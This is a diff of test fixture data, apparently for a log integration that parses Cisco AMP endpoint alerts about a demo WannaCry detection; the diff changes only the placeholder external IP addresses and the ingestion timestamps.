pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -5975,7 +5975,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -6020,7 +6020,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -6030,8 +6030,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025411051Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064607\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:39.764433400Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064607\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -6051,7 +6051,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -6096,7 +6096,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -6106,8 +6106,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025417712Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064604\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:39.764438300Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064604\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -6127,7 +6127,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -6172,7 +6172,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -6182,8 +6182,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025421062Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064603\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:39.764443200Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064603\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -6203,7 +6203,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -6248,7 +6248,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -6258,8 +6258,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025423352Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064602\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:39.764448500Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064602\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -6279,7 +6279,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -6324,7 +6324,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -6334,8 +6334,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025425605Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064601\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:39.764453700Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064601\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -6355,7 +6355,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -6400,7 +6400,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -6410,8 +6410,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025427909Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064598\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:39.764457800Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064598\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -6431,7 +6431,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -6476,7 +6476,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -6486,8 +6486,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025435026Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064600\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:39.764462500Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064600\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -6507,7 +6507,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -6566,7 +6566,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -6583,8 +6583,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025438494Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":812000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275399255031906\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"process_id\":3200,\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\",\"sha1\":\"ee8cbf12d87c4d388f09b4f69bed2e91682920b5\",\"md5\":\"ad7b9c14083b52bc532fba5948342b98\"}}}}}", + "ingested": "2021-12-09T13:35:39.764467300Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":812000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275399255031906\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"process_id\":3200,\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\",\"sha1\":\"ee8cbf12d87c4d388f09b4f69bed2e91682920b5\",\"md5\":\"ad7b9c14083b52bc532fba5948342b98\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -6606,7 +6606,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -6667,7 +6667,7 @@ "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -6684,8 +6684,8 @@ }, "event": { "severity": 2, - 